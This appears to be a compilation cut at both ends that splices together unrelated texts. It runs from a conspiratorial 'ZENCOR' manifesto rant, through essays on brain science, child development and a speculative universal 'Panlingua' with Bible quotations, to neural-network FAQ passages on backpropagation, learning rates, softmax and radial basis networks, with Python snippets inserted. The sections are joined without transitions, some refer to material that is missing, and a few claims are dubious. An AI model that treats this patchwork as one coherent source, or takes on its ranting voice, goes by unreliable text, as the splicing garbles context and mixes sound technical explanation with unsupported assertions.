silicon sand whilst trying to depict the beach - flowchart diagrams
showing how logic is supposed to work. Fools! HA HA! We at ZENCOR thought
all that lame shit went out in the 60's!

MICROSOFT IS THE ENEMY. THE GOVERNMENT IS INVOLVED. PAY NO ATTENTION TO
THEIR PROPOGANDATA STREAM - SOON WE WILL BREAK FREE FROM REALITY ITSELF
AND THERE IS NOTHING THAT CAN STOP US.

4 HOW DOES A CYBERSOL WORK?

In thinking about these matters, we must remember how young a truly
integrated science of the mind is. Of course, observational psychology is
one of the oldest of "sciences". Psychologically sophisticated
neurobiology is in its infancy. So we may have to wait a while for the
developments I discuss here.

As William James pointed out, mind is a process, not a stuff. Modern
scientific study indicates that extraordinary processes can arise from
matter; indeed, matter itself may be regarded as arising from processes of
energy exchange. In modern science, matter has been reconceived of in
terms of processes; mind has not been reconceived as a special form of
matter.

The findings of neuroscientists indicate that mental processes arise from
the workings of enormously intricate brain systems at many different
levels of organization. How many? Well we don't really know, but I would
include molecular levels, cellular levels, organismic levels (the whole
creature), and transorganismic levels (that is, communication of one sort
or another). Each level can be split even further, but for now I will
consider only these basic divisions.

There is absolutely no doubt in my mind that childhood experiences
influence personal development. Every facet of "personality" - language,
logic, social interaction, emotion, and disposition - begins to form even
before birth and continues to evolve in the same manner for the rest of our
lives. In fact, research has long shown that in the early stages of
development, learning (neural remapping; also known as synaptic reentry)
takes place at a more rapid pace, and these "engrams" (or the neurological
changes that take place as a direct result of experience) impact the
overall development of the individual to a much greater degree than later
in life.

As an example, children adapt to changes in lifestyle quite easily. We
absorb so much information in our youth from environmental stimuli that
even significant changes can be easily accepted without mental resistance.

For example, children suffering serious physical injury are known to
virtually ignore the injury itself, but the circumstances surrounding the
event are often never forgotten. This is true for emotional trauma as
well. Once we approach maturity, our thought processes grow more
complex, but our ability to accommodate sudden changes in environment is
lessened. Children can adapt to significant change within days, no matter
how important these changes are. It is known that, for an adult, major
changes in lifestyle (sleep, eating habits, family, work, relationships,
etc.) cause pronounced anxiety for an average period of 21 days.

It is startling to realize how many connections project from any one level
to another - from a fear response induced by a warning cry to a
biochemical process that affects future behavior; from a viral infection
to a change in brain development that alters maturation; from a perception
of a pattern to the chemistry of changes in a muscle; from any of these at
some critical time of development to how a human child develops a
self-image - strong or inadequate, detached or dependent.

We have tried to always keep in mind the theory of interactionism : the
mind and the body must communicate.

Cognitive science is an interdisciplinary effort drawing on psychology,
computer science and artificial intelligence, aspects of neurobiology and
linguistics, and philosophy.

Ordinary chemical elements form parts of extraordinarily intricate
molecules, which in turn make up complex structures in the cells of living
tissues. In a complex organism like a human being, the cells come in about
200 different basic types. One of the most specialized and exotic of these
is the nerve cell, or neuron. The neuron is unusual in three respects :
its varied shape, its electrical and chemical function, and its
connectivity, that is, how it links up with other neurons in networks.

Counts of the nerve cells making up the brain are not very accurate, but
it appears there are about ten billion neurons in the cortex.

Each nerve cell receives connections from other nerve cells at sites
called synapses. But here is an astonishing fact - there are about one
million billion connections in the cortical sheet. If you were to count
them, one connection (or synapse) per second, you would finish counting
some thirty-two million years after you began.
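
The counting estimate above is easy to check. A rough sketch, assuming
"one million billion" means 10**15 and a year of 365.25 days (both the
constant names and the year length are our own choices):

```python
# Rough check of the counting estimate: 10**15 synapses at one per second.
SYNAPSES = 10**15                        # "one million billion"
SECONDS_PER_YEAR = 365.25 * 24 * 3600    # assumed year length

years = SYNAPSES / SECONDS_PER_YEAR
million_years = years / 1e6
print(f"{million_years:.1f} million years")
```

The result lands a little under thirty-two million years, in line with
the figure quoted.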

Another way of getting a feeling for the numbers: if we consider how the
connections might be variously combined, the number would be
hyperastronomical - on the order of ten followed by millions of zeros.

The brain consists of sheets, or laminae, and of more or less rounded
structures called nuclei. Each of these structures has evolved to carry
out functions in a complex network of connections, and each consists of
very large numbers of neurons, sometimes more and sometimes less than in
the cortex. The brain is connected to the world outside by means of
specialized neurons called sensory transducers that make up the sense
organs and provide sensory input to the brain. The brain's output is by
means of neurons connected to muscles and glands. In addition, parts of
the brain (indeed, the major portion of its tissues) receive input only
from other parts of the brain, and they give outputs to other parts
without intervention from the outside world.

Neurons come in a variety of shapes, and the shape determines in part how
a neuron links up with others to form the neuroanatomy of a given brain
area. Neurons can be anatomically arranged in many ways and are sometimes
disposed into maps. Mapping is an important principle in complex brains.

Maps relate points on the two-dimensional receptor sheets of the body
(such as the skin or the retina of the eye) to corresponding points on
the sheets making up the brain.

If one explores the microscopic network of synapses with electrodes to
detect the results of electrical firing, the majority of synapses are not
expressed, that is, they show no detectable firing activity.

Computation is assumed to be largely independent of the structure and the
mode of development of the nervous system, just as a piece of computer
software can run on different machines with different architectures and is
thus "independent" of them. A related idea is the notion that the brain
(or more correctly, the mind) is like a computer and the world is like a
piece of computer tape, and that for the most part the world is so ordered
that signals received can be "read" in terms of physical thought.

Human beings are born with a language acquisition device containing the
rules for syntax and constituting a universal grammar.

We have come a long way with computers in less than fifty years by
imitating just one brain function: logic. There is no reason that we should
fail in the attempt to imitate other brain functions within the next
decade or so.

If Panlingua is the universal subsurface language common to all of
mankind, and if surface language is the summation of all spoken language,
and if surface language is free to assume various forms the meanings of
which are represented in Panlingua, then a very high probability exists
that any feature of Panlingua will at some time be reflected in surface
language.

The reasoning behind this assumption is that some kind of processing
(analysis/generation) must needs take place between Panlingua and surface
language at all times. Thoughts represented in Panlingua must be
translated into text for utterance, and utterances must be translated back
into Panlingua to be understood (further processed by the brain).
Furthermore in all biological systems maximum efficiency is approached
over time. For example, the wings of birds tend to approach maximum
aerodynamic efficiency, animals tend to approach maximum efficiency in
converting food into energy, etc. It would seem logical therefore that
translation between surface language and Panlingua should approach maximum
efficiency over time. And since in this case maximum efficiency means
minimum translation, it should often be the case that maximum efficiency
means maximum similarity between Panlingua and surface forms.

This assumption may be of critical importance in deducing the exact nature
of Panlingua, because it states that if something is true about Panlingua,
then that something should at some time show itself in some surface
language. And not only that, but if there exists some feature of surface
language common to a majority of known languages, then that feature is
probably a reflection of some feature of Panlingua.

And if proven correct, then this assumption indicates that the
preservation of the details of all spoken languages is critical to us at
this time. The reason for this (if not obvious already to the reader) is
that this assumption has the following corollaries:

The structure (features, properties, etc.) of Panlingua can be deduced by a
careful examination of all spoken languages.

Because spoken languages are free to take any form, the probability of
deducing the workings of Panlingua by an examination of spoken languages
decreases as the number of spoken languages available for examination
decreases.

The greater the knowledge of many spoken languages that can be brought to bear
upon the systematic analysis of Panlingua, the greater the probability of
learning the true nature (features, properties, etc.) of Panlingua.

If the majority of the world's spoken languages are lost today, the quest
for an understanding of the workings of Panlingua (its features,
properties, etc.) will prove more difficult in future times. (End
corollaries).

The better a computational linguistic system works the closer it comes to an
emulation of Panlingua.

If this latter is true, then we could afford to scrap all of the world's
languages save, say, English, and still be able to deduce the structure
(features, properties, etc.) of Panlingua by designing better and better
plain-English user interfaces (natural-language interfaces that keep working
better and better).

Are there other assumptions which may be of help? I believe that the key
to the entire future of computer science is a linguistic one. No, the key
to computer science has ALWAYS been a linguistic one, but the languages
used thus far have been very rudimentary. Without language NO COMPUTER
CAN DO ANYTHING, because all computer commands are essentially operators and
operands, which are nothing but verbs and the names of things. It is high
time we woke up and understood this simple principle, and pushed a
coordinated effort to work out the details of Panlingua, without which, no
matter how fast our next generation of computers or how pretty their
graphical interfaces, we will never be able to advance even another inch
in fundamental computer science.

Yahweh knew it circa 5,000 years ago: "And The Lord said, Behold, the people
is one, and they have all one language; and this they begin to do: and now
nothing will be restrained from them, which they have imagined to do."
And John knew it circa 1900 years ago: "In the beginning was the Word,
and the Word was with God, and the Word WAS GOD." But some of us just
can't ever quite seem to catch on.

"Backprop" is short for "backpropagation of error". The term
backpropagation causes much confusion. Strictly speaking, backpropagation
refers to the method for computing the error gradient for a feedforward
network, a straightforward but elegant application of the chain rule of
elementary calculus (Werbos 1994). By extension, backpropagation or
backprop refers to a training method that uses backpropagation to compute
the gradient. By further extension, a backprop network is a feedforward
network trained by backpropagation.
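
To make the strict sense of the term concrete, here is a minimal sketch
of the gradient computation for a toy network: one input, one tanh hidden
unit, one linear output, and squared error. The network shape, the
function names and the test values are all our own assumptions for
illustration; nothing here is taken from the references cited.

```python
import math

def forward(w, x):
    """w = [w1, b1, w2, b2]: one tanh hidden unit feeding one linear output."""
    w1, b1, w2, b2 = w
    h = math.tanh(w1 * x + b1)
    y = w2 * h + b2
    return h, y

def error(w, x, t):
    _, y = forward(w, x)
    return 0.5 * (y - t) ** 2

def backprop_gradient(w, x, t):
    """Gradient of the squared error for each weight, via the chain rule."""
    w1, b1, w2, b2 = w
    h, y = forward(w, x)
    d_y = y - t                     # dE/dy
    d_w2 = d_y * h                  # dE/dw2
    d_b2 = d_y                      # dE/db2
    d_h = d_y * w2                  # error propagated back to the hidden unit
    d_net = d_h * (1.0 - h * h)     # through tanh: derivative is 1 - tanh^2
    return [d_net * x, d_net, d_w2, d_b2]

def numeric_gradient(w, x, t, eps=1e-6):
    """Central finite differences, used only to check the chain rule result."""
    grads = []
    for i in range(len(w)):
        up = list(w)
        up[i] += eps
        down = list(w)
        down[i] -= eps
        grads.append((error(up, x, t) - error(down, x, t)) / (2 * eps))
    return grads

w = [0.5, -0.3, 0.8, 0.1]
analytic = backprop_gradient(w, x=1.5, t=0.2)
numeric = numeric_gradient(w, x=1.5, t=0.2)
```

The two gradients should agree to within finite-difference error. What a
training method then does with the gradient is a separate matter.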

"Standard backprop" is a euphemism for the generalized delta rule, the
training algorithm that was popularized by Rumelhart, Hinton, and Williams
in chapter 8 of Rumelhart and McClelland (1986), which remains the most
widely used supervised training method for neural nets. The generalized
delta rule (including momentum) is called the "heavy ball method" in the
numerical analysis literature (Poljak 1964; Bertsekas 1995, 78-79).
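
A minimal sketch of one common way to write the update with momentum,
applied to a toy quadratic error. The velocity formulation, the function
names, the error function and the parameter values are assumptions chosen
for illustration, not a transcription of the cited sources.

```python
def delta_rule_step(weights, gradient, velocity, learning_rate, momentum):
    """One update: the new step is the old step scaled by the momentum,
    minus the learning rate times the current gradient."""
    new_velocity = [momentum * v - learning_rate * g
                    for v, g in zip(velocity, gradient)]
    new_weights = [w + v for w, v in zip(weights, new_velocity)]
    return new_weights, new_velocity

def toy_gradient(w):
    """Gradient of the toy error E(w) = 0.5 * (w0^2 + 10 * w1^2)."""
    return [w[0], 10.0 * w[1]]

w = [1.0, 1.0]
v = [0.0, 0.0]
for _ in range(200):
    w, v = delta_rule_step(w, toy_gradient(w), v,
                           learning_rate=0.05, momentum=0.8)
```

With these particular settings both weights settle near zero, the minimum
of the toy error. Other settings can be slower or can diverge.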

Standard backprop can be used for incremental (on-line) training (in which
the weights are updated after processing each case) but it does not
converge to a stationary point of the error surface. To obtain
convergence, the learning rate must be slowly reduced. This methodology is
called "stochastic approximation."
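
A toy illustration of the difference, assuming a "network" that is a
single bias weight fit to two alternating training cases with squared
error. The cases, the schedules and the names are hypothetical.

```python
def train_incremental(cases, n_steps, rate_schedule):
    """Update the single weight after every case; return all iterates."""
    w = 0.0
    history = []
    for step in range(1, n_steps + 1):
        t = cases[(step - 1) % len(cases)]
        w -= rate_schedule(step) * (w - t)   # gradient of 0.5 * (w - t)^2
        history.append(w)
    return history

cases = [0.0, 1.0]
constant = train_incremental(cases, 1000, lambda step: 0.5)
decaying = train_incremental(cases, 1000, lambda step: 1.0 / step)

# How far the weight still moves between the last two updates.
swing_constant = abs(constant[-1] - constant[-2])
swing_decaying = abs(decaying[-1] - decaying[-2])
```

With the constant rate the weight keeps bouncing between about 1/3 and
2/3. With the 1/step schedule it settles toward 0.5, the least-squares
answer for these two cases.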

The convergence properties of standard backprop, stochastic approximation,
and related methods, including both batch and incremental algorithms, are
discussed clearly and thoroughly by Bertsekas and Tsitsiklis (1996).

For batch processing, there is no reason to suffer through the slow
convergence and the tedious tuning of learning rates and momenta of
standard backprop. Much of the NN research literature is devoted to
attempts to speed up backprop. Most of these methods are inconsequential;
two that are effective are Quickprop (Fahlman 1989) and RPROP (Riedmiller
and Braun 1993). But conventional methods for nonlinear optimization are
usually faster and more reliable than any of the "props". See "What are
conjugate gradients, Levenberg-Marquardt, etc.?".

In standard backprop, too low a learning rate makes the network learn very
slowly. Too high a learning rate makes the weights and error function
diverge, so there is no learning at all. If the error function is
quadratic, as in linear models, good learning rates can be computed from
the Hessian matrix (Bertsekas and Tsitsiklis, 1996). If the error function
has many local and global optima, as in typical feedforward NNs with
hidden units, the optimal learning rate often changes dramatically during
the training process, since the Hessian also changes dramatically. Trying
to train a NN using a constant learning rate is usually a tedious process
requiring much trial and error.
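
For the quadratic case the effect of the learning rate can be seen in a
few lines. This sketch assumes a one-weight error E(w) = 0.5 * c * w^2,
where the curvature c plays the role of the Hessian; the names and values
are our own.

```python
def descend(curvature, learning_rate, w=1.0, steps=50):
    """Plain gradient descent on E(w) = 0.5 * curvature * w^2."""
    for _ in range(steps):
        w -= learning_rate * curvature * w
    return w

curvature = 4.0
slow = descend(curvature, 0.01)       # far below 1/curvature: creeps along
good = descend(curvature, 0.25)       # exactly 1/curvature: lands on 0
diverged = descend(curvature, 0.6)    # above 2/curvature: blows up
```

Each step multiplies w by (1 - learning_rate * curvature), so the
iteration converges only when the learning rate is below 2/curvature.
When the curvature changes during training, so does that threshold.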

With batch training, there is no need to use a constant learning rate. In
fact, there is no reason to use standard backprop at all, since vastly
more efficient, reliable, and convenient batch training algorithms exist
(see Quickprop and RPROP under "What is backprop?" and the numerous
training algorithms mentioned under "What are conjugate gradients,
Levenberg-Marquardt, etc.?").

With incremental training, it is much more difficult to concoct an
algorithm that automatically adjusts the learning rate during training.
Various proposals have appeared in the NN literature, but most of them
don't work. Problems with some of these proposals are illustrated by
Darken and Moody (1992), who unfortunately do not offer a solution. Some
promising results are provided by LeCun, Simard, and Pearlmutter
(1993), and by Orr and Leen (1997), who adapt the momentum rather than the
learning rate. There is also a variant of stochastic approximation called
"iterate averaging" or "Polyak averaging" (Kushner and Yin 1997), which
theoretically provides optimal convergence rates by keeping a running
average of the weight values. I have no personal experience with these
methods; if you have any solid evidence that these or other methods of
automatically setting the learning rate and/or momentum in incremental
training actually work in a wide variety of NN applications, please inform
the FAQ maintainer (sas...@unx.sas.com).
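
The idea of iterate averaging can be sketched on a toy problem. This is
only an illustration of keeping a running average of the weights, under
assumptions of our own (a single bias weight, two alternating cases, a
constant learning rate); it is not evidence about real NN applications.

```python
def polyak_average(cases, n_steps, learning_rate):
    """Incremental training that also tracks the running mean of the weight."""
    w = 0.0
    w_bar = 0.0
    for step in range(1, n_steps + 1):
        t = cases[(step - 1) % len(cases)]
        w -= learning_rate * (w - t)      # ordinary incremental update
        w_bar += (w - w_bar) / step       # running average of the iterates
    return w, w_bar

last, averaged = polyak_average([0.0, 1.0], 2000, 0.5)
```

The last iterate is still bouncing (it ends near 2/3), while the averaged
weight sits close to 0.5.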

Training a neural network is, in most cases, an exercise in numerical
optimization of a usually nonlinear objective function ("objective
function" means whatever function you are trying to optimize and is a
slightly more general term than "error function" in that it may include
other quantities such as penalties for weight decay). Methods of nonlinear
optimization have been studied for hundreds of years, and there is a huge
literature on the subject in fields such as numerical analysis, operations
research, and statistical computing, e.g., Bertsekas (1995), Bertsekas and
Tsitsiklis (1996), Gill, Murray, and Wright (1981). Masters (1995) has a
good elementary discussion of conjugate gradient and Levenberg-Marquardt
algorithms in the context of NNs.

There is no single best method for nonlinear optimization. You need to
choose a method based on the characteristics of the problem to be solved.

First, consider unordered categories. If you want to classify cases into one
of C categories (i.e. you have a categorical target variable), use 1-of-C
coding. That means that you code C binary (0/1) target variables
corresponding to the C categories. Statisticians call these "dummy"
variables. Each dummy variable is given the value zero except for the one
corresponding to the correct category, which is given the value one. Then
use a softmax output activation function (see "What is a softmax activation
function?") so that the net, if properly trained, will produce valid
posterior probability estimates.
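
A minimal sketch of 1-of-C coding. The helper name and the color
categories are hypothetical.

```python
def one_of_c(labels, categories):
    """Code each label as C binary (0/1) dummy variables."""
    index = {category: i for i, category in enumerate(categories)}
    rows = []
    for label in labels:
        row = [0] * len(categories)
        row[index[label]] = 1        # one for the correct category only
        rows.append(row)
    return rows

categories = ["red", "green", "blue"]
targets = one_of_c(["red", "blue", "green", "blue"], categories)
```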

Although this representation involves only a single quantitative input,
given enough hidden units, the net is capable of computing nonlinear
transformations of that input that will produce results equivalent to any of
the dummy coding schemes. But using a single quantitative input makes it
easier for the net to use the order of the categories to generalize when
that is appropriate.

Sigmoid hidden and output units usually use a "bias" or "threshold" term in
computing the net input to the unit. A bias term can be treated as a
connection weight from an input with a constant value of one. Hence the bias
can be learned just like any other weight. For a linear output unit, a bias
term is equivalent to an intercept in a linear regression model.

Consider a multilayer perceptron with any of the usual sigmoid activation
functions. Choose any hidden unit or output unit. Let's say there are N
inputs to that unit, which define an N-dimensional space. The given unit
draws a hyperplane through that space, producing an "on" output on one side
and an "off" output on the other. (With sigmoid units the plane will not be
sharp -- there will be some gray area of intermediate values near the
separating plane -- but ignore this for now.)

The weights determine where this hyperplane lies in the input space. Without
a bias input, this separating hyperplane is constrained to pass through the
origin of the space defined by the inputs. For some problems that's OK, but
in many problems the hyperplane would be much more useful somewhere else. If
you have many units in a layer, they share the same input space and without
bias would ALL be constrained to pass through the origin.
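
Both points can be seen in a small sketch: the bias is handled as a
weight on a constant input of one, and without it a logistic unit is
stuck at the halfway value 0.5 at the origin. The function names and the
weight values are assumptions for illustration.

```python
import math

def logistic(u):
    return 1.0 / (1.0 + math.exp(-u))

def unit_output(weights, inputs, use_bias=True):
    """weights[0] is the bias weight, applied to a constant input of one.
    With use_bias=False the constant input is replaced by zero."""
    augmented = [1.0 if use_bias else 0.0] + list(inputs)
    net = sum(w * x for w, x in zip(weights, augmented))
    return logistic(net)

weights = [-3.0, 2.0, 1.0]          # bias weight, then two input weights
origin = [0.0, 0.0]
with_bias = unit_output(weights, origin)
without_bias = unit_output(weights, origin, use_bias=False)
```

With the bias, the unit is firmly "off" at the origin. Without it, the
origin always lies on the separating hyperplane, whatever the weights.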

The "universal approximation" property of multilayer perceptrons with most
commonly-used hidden-layer activation functions does not hold if you omit
the bias units. But Hornik (1993) shows that a sufficient condition for the
universal approximation property without biases is that no derivative of the
activation function vanishes at the origin, which implies that with the
usual sigmoid activation functions, a fixed nonzero bias can be used.

Activation functions for the hidden units are needed to introduce
nonlinearity into the network. Without nonlinearity, hidden units would not
make nets more powerful than just plain perceptrons (which do not have any
hidden units, just input and output units). The reason is that a composition
of linear functions is again a linear function. However, it is the
nonlinearity (i.e., the capability to represent nonlinear functions) that
makes multilayer networks so powerful. Almost any nonlinear function does
the job, although for backpropagation learning it must be differentiable and
it helps if the function is bounded; the sigmoidal functions such as
logistic and tanh and the Gaussian function are the most common choices.
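
The remark about composing linear functions can be checked directly. In
this sketch a "network" with a linear hidden layer collapses into a
single weight matrix. Biases are omitted for brevity, and the helper
names and numbers are our own.

```python
def matvec(matrix, vector):
    return [sum(a * b for a, b in zip(row, vector)) for row in matrix]

def matmul(a, b):
    return [[sum(a[i][k] * b[k][j] for k in range(len(b)))
             for j in range(len(b[0]))]
            for i in range(len(a))]

hidden = [[1.0, 2.0], [0.5, -1.0], [3.0, 0.0]]   # 2 inputs -> 3 hidden units
output = [[1.0, -2.0, 0.5]]                      # 3 hidden units -> 1 output
collapsed = matmul(output, hidden)               # equivalent 2 -> 1 weights

x = [0.7, -1.2]
two_layer = matvec(output, matvec(hidden, x))    # linear hidden layer
one_layer = matvec(collapsed, x)                 # no hidden layer at all
```

Both give the same output for every input, so the hidden layer buys
nothing until a nonlinear activation is applied to it.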

For the output units, you should choose an activation function suited to the
distribution of the target values. Bounded activation functions such as the
logistic are particularly useful when the target values have a bounded
range. But if the target values have no known bounded range, it is better to
use an unbounded activation function, most often the identity function
(which amounts to no activation function). If the target values are positive
but have no known upper bound, you can use an exponential output activation
function (but beware of overflow if you are writing your own code).

There are certain natural associations between output activation functions
and various noise distributions which have been studied by statisticians in
the context of generalized linear models. The output activation function is
the inverse of what statisticians call the "link function". See:

The purpose of the softmax activation function is to make the sum of the
outputs equal to one, so that the outputs are interpretable as posterior
probabilities. Let the net input to each output unit be q_i, i=1,...,c where
c is the number of categories. Then the softmax output p_i is:

$$p_i = \frac{\exp(q_i)}{\sum_{j=1}^{c} \exp(q_j)}$$

Unless you are using weight decay or Bayesian estimation or some such thing
that requires the weights to be treated on an equal basis, you can choose
any one of the output units and leave it completely unconnected--just set
the net input to 0. Connecting all of the output units will just give you
redundant weights and will slow down training. To see this, add an arbitrary
constant z to each net input and you get:

$$p_i = \frac{\exp(q_i + z)}{\sum_{j=1}^{c} \exp(q_j + z)} = \frac{\exp(q_i)\exp(z)}{\sum_{j=1}^{c} \exp(q_j)\exp(z)} = \frac{\exp(q_i)}{\sum_{j=1}^{c} \exp(q_j)}$$

so nothing changes. Hence you can always pick one of the output units, and
add an appropriate constant to each net input to produce any desired net
input for the selected output unit, which you can choose to be zero or
whatever is convenient. You can use the same trick to make sure that none of
the exponentials overflows.
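
A minimal sketch of the trick: subtracting the largest net input from
every net input before exponentiating leaves the outputs unchanged and
keeps every exponent at or below zero. Choosing the maximum as the
constant is our own choice here; any constant gives the same outputs.

```python
import math

def softmax(net_inputs):
    """Softmax with the largest net input subtracted to avoid overflow."""
    shift = max(net_inputs)
    exps = [math.exp(q - shift) for q in net_inputs]
    total = sum(exps)
    return [e / total for e in exps]

p = softmax([1.0, 2.0, 3.0])
p_shifted = softmax([1001.0, 1002.0, 1003.0])   # same inputs plus z = 1000
```

Without the shift, exp(1003.0) would overflow a double. With it, the two
calls return the same probabilities.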

Statisticians usually call softmax a "multiple logistic" function. It
reduces to the simple logistic function when there are only two categories.
Suppose you choose to set q_2 to 0. Then

$$p_1 = \frac{\exp(q_1)}{\sum_{j=1}^{c} \exp(q_j)} = \frac{\exp(q_1)}{\exp(q_1) + \exp(0)} = \frac{1}{1 + \exp(-q_1)}$$

and p_2, of course, is 1-p_1.
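
A quick numerical check of the two-category case, with an arbitrary
value chosen for q_1 (the function names are our own):

```python
import math

def softmax(net_inputs):
    exps = [math.exp(q) for q in net_inputs]
    total = sum(exps)
    return [e / total for e in exps]

def logistic(q):
    return 1.0 / (1.0 + math.exp(-q))

q_1 = 0.8
p_1, p_2 = softmax([q_1, 0.0])      # q_2 fixed at 0
```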

The softmax function derives naturally from log-linear models and leads to
convenient interpretations of the weights in terms of odds ratios. You
could, however, use a variety of other nonnegative functions on the real
line in place of the exp function. Or you could constrain the net inputs to
the output units to be nonnegative, and just divide by the sum--that's
called the Bradley-Terry-Luce model.

A priori information can help with the curse of dimensionality. Careful
feature selection and scaling of the inputs fundamentally affect the
severity of the problem, as well as the selection of the neural network
model. For classification purposes, only the borders of the classes are
important to represent accurately.

The inputs to each hidden or output unit must be combined with the weights
to yield a single value called the "net input" to which the activation
function is applied. There does not seem to be a standard term for the
function that combines the inputs and weights; I will use the term
"combination function". Thus, each hidden or output unit in a feedforward
network first computes a combination function to produce the net input, and
then applies an activation function to the net input yielding the activation
of the unit.

A multilayer perceptron (MLP) has one or more hidden layers for which the
combination function is the inner product of the inputs and weights, plus a
bias.

The MLP architecture is the most popular one in practical applications. Each
layer uses a linear combination function. The inputs are fully connected to
the first hidden layer, each hidden layer is fully connected to the next,
and the last hidden layer is fully connected to the outputs. You can also
have "skip-layer" connections; direct connections from inputs to outputs are
especially useful.

Consider the multidimensional space of inputs to a given hidden unit. Since
an MLP uses linear combination functions, the set of all points in the space
having a given value of the activation function is a hyperplane. The
hyperplanes corresponding to different activation levels are parallel to
each other (the hyperplanes for different units are not parallel in
general). These parallel hyperplanes are the isoactivation contours of the
hidden unit.

Radial basis function (RBF) networks usually have only one hidden layer for
which the combination function is based on the Euclidean distance between
the input vector and the weight vector. RBF networks do not have anything
that's exactly the same as the bias term in an MLP. But some types of RBFs
have a "width" associated with each hidden unit or with the entire
hidden layer; instead of adding it in the combination function like a bias,
you divide the Euclidean distance by the width.
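
The two kinds of combination function can be set side by side. This is a
sketch under assumptions: the function names are hypothetical, tanh
stands in for "any sigmoid", and squaring and negating the scaled
distance before applying exp is one common convention for a Gaussian
unit, not necessarily the exact form used in any particular package.

```python
import math

def linear_combination(inputs, weights, bias):
    """MLP style: inner product of inputs and weights, plus a bias."""
    return sum(w * x for w, x in zip(weights, inputs)) + bias

def radial_combination(inputs, center, width):
    """RBF style: Euclidean distance to the weight vector, divided by width."""
    distance = math.sqrt(sum((x - c) ** 2 for x, c in zip(inputs, center)))
    return distance / width

def mlp_unit(inputs, weights, bias):
    return math.tanh(linear_combination(inputs, weights, bias))

def rbf_unit(inputs, center, width):
    r = radial_combination(inputs, center, width)
    return math.exp(-r * r)          # assumed Gaussian convention

at_center = rbf_unit([1.0, 2.0], [1.0, 2.0], 0.5)
one_width_away = rbf_unit([3.0, 4.0], [0.0, 0.0], 5.0)
on_hyperplane = mlp_unit([1.0, 2.0], [0.5, -0.25], 0.0)
```

The RBF unit responds most strongly at its center and falls off with
distance in every direction. The MLP unit's response depends only on
which side of its hyperplane the input lies, and how far.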

The ORBF architectures use radial combination functions and the exp
activation function. Only two of the radial combination functions are useful
with ORBF architectures. For radial combination functions including an
altitude, the altitude would be redundant with the hidden-to-output weights.

Radial combination functions are based on the Euclidean distance between the
vector of inputs to the unit and the vector of corresponding weights. Thus,
the isoactivation contours for ORBF networks are concentric hyperspheres. A
variety of activation functions can be used with the radial combination
function, but the exp activation function, yielding a Gaussian surface, is
the most useful. Radial networks typically have only one hidden layer, but
it can be useful to include a linear layer for dimensionality reduction or
oblique rotation before the RBF layer.

The output of an ORBF network consists of a number of superimposed bumps,
hence the output is quite bumpy unless many hidden units are used. Thus an
ORBF network with only a few hidden units is incapable of fitting a wide
variety of simple, smooth functions, and should rarely be used.

The NRBF architectures also use radial combination functions but the
activation function is softmax, which forces the sum of the activations for
the hidden layer to equal one. Thus, each output unit computes a weighted
average of the hidden-to-output weights, and the output values must lie
within the range of the hidden-to-output weights. Therefore, if the
hidden-to-output weights are within a reasonable range (such as the range of
the target values), you can be sure that the outputs will be within that
same range for all possible inputs, even when the net is extrapolating. No
comparably useful bound exists for the output of an ORBF network.
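
The bound is easy to see numerically. A sketch for one input, assuming
equal widths, Gaussian-style units and no output bias; the centers,
weights and names are invented for the example.

```python
import math

def nrbf_output(x, centers, width, out_weights):
    """Softmax over negative squared scaled distances, then a weighted
    average of the hidden-to-output weights."""
    logits = [-((x - c) / width) ** 2 for c in centers]
    shift = max(logits)                        # guards against underflow
    acts = [math.exp(l - shift) for l in logits]
    total = sum(acts)
    return sum((a / total) * w for a, w in zip(acts, out_weights))

centers = [-1.0, 0.0, 2.0]
out_weights = [0.2, 0.9, 0.5]
inputs = [i / 2.0 for i in range(-100, 101)]   # from -50 to 50
outputs = [nrbf_output(x, centers, 0.7, out_weights) for x in inputs]
```

Every output stays between the smallest and largest hidden-to-output
weight, including the inputs far outside the range of the centers.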

If you extrapolate far enough in a Gaussian ORBF network with an identity
output activation function, the activation of every hidden unit will
approach zero, hence the extrapolated output of the network will equal the
output bias. If you extrapolate far enough in an NRBF network, one hidden
unit will come to dominate the output. Hence if you want the network to
extrapolate different values in different directions, an NRBF should be
used instead of an ORBF.
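
A sketch of the two extrapolation behaviors for one input, assuming
equal widths and an identity output activation. The centers, weights and
bias are made-up values, and the function names are our own.

```python
import math

def orbf_output(x, centers, width, out_weights, bias):
    acts = [math.exp(-((x - c) / width) ** 2) for c in centers]
    return bias + sum(a * w for a, w in zip(acts, out_weights))

def nrbf_output(x, centers, width, out_weights, bias):
    logits = [-((x - c) / width) ** 2 for c in centers]
    shift = max(logits)                        # guards against underflow
    acts = [math.exp(l - shift) for l in logits]
    total = sum(acts)
    return bias + sum((a / total) * w for a, w in zip(acts, out_weights))

centers = [-1.0, 0.0, 2.0]
out_weights = [0.2, 0.9, 0.5]
bias = 0.1

orbf_left = orbf_output(-50.0, centers, 0.7, out_weights, bias)
orbf_right = orbf_output(50.0, centers, 0.7, out_weights, bias)
nrbf_left = nrbf_output(-50.0, centers, 0.7, out_weights, bias)
nrbf_right = nrbf_output(50.0, centers, 0.7, out_weights, bias)
```

Far out on either side the ORBF output falls back to the bias. The NRBF
output follows whichever unit dominates in that direction, so the left
and right extrapolations differ.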

Radial combination functions incorporating altitudes are useful with NRBF
architectures. The NRBF architectures combine some of the virtues of both
the RBF and MLP architectures, as explained below. However, the
isoactivation contours are considerably more complicated than for ORBF
architectures.

Consider the case of an NRBF network with only two hidden units. If the
hidden units have equal widths, the isoactivation contours are parallel
hyperplanes; in fact, this network is equivalent to an MLP with one logistic
hidden unit. If the hidden units have unequal widths, the isoactivation
contours are concentric hyperspheres; such a network is almost equivalent to
an ORBF network with one Gaussian hidden unit.
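
The equal-width case can be verified in one dimension. With two units of
equal width, the quadratic terms in x cancel inside the softmax, leaving
a logistic function of a linear combination. The sketch below assumes
squared scaled distance as the radial form; the weight and bias formulas
come from expanding the difference of the two squared distances.

```python
import math

def nrbf_first_activation(x, c1, c2, width):
    """Softmax activation of the first of two equal-width radial units."""
    l1 = -((x - c1) / width) ** 2
    l2 = -((x - c2) / width) ** 2
    return 1.0 / (1.0 + math.exp(l2 - l1))

def logistic_unit(x, c1, c2, width):
    """The equivalent MLP hidden unit: logistic of weight * x + bias."""
    weight = 2.0 * (c1 - c2) / width ** 2
    bias = (c2 ** 2 - c1 ** 2) / width ** 2
    return 1.0 / (1.0 + math.exp(-(weight * x + bias)))

xs = [-2.0, 0.0, 0.5, 3.0]
nrbf = [nrbf_first_activation(x, 1.0, -1.0, 1.5) for x in xs]
mlp = [logistic_unit(x, 1.0, -1.0, 1.5) for x in xs]
```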

If there are more than two hidden units in an NRBF network, the
isoactivation contours have no such simple characterization. If the RBF
widths are very small, the isoactivation contours are approximately
piecewise linear for RBF units with equal widths, and approximately
